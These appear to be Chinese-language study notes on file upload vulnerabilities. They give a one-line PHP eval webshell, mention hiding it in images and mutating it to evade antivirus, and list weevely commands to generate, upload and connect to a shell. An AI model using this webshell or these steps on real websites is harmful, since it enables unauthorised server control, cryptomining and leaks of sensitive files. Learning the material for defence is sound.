文件上传漏洞

webshell

一句话木马

eval($_POST['muma']);

system函数可以执行操作系统的命令

代码短，只有一行代码。

场景多，可以单独生成文件，也可以插入到图片中。

安全性高，隐藏性强，可变形免杀

小马

体积小，功能少，只有文件上传功能，为大马做铺垫。

大马

体积大，功能全，能够管理数据库、文件管理、对站点进行快速的信息收集，甚至能够提权。

网站控制工具

中国蚁剑、weevely、哥斯拉、冰蝎

weevely使用

 1、生成木马weevely generate 密码 weevely.php

2、kali传送给物理机并上传

sz file weevely.php

3、连接

weevely 木马文件路径 密码

 

behinder启动（和哥斯拉相同）

java -jar Behinder.jar

shell保存在server文件夹中

 文件上传漏洞的危害

1、挂黑链

2、挖矿

3、敏感文件泄露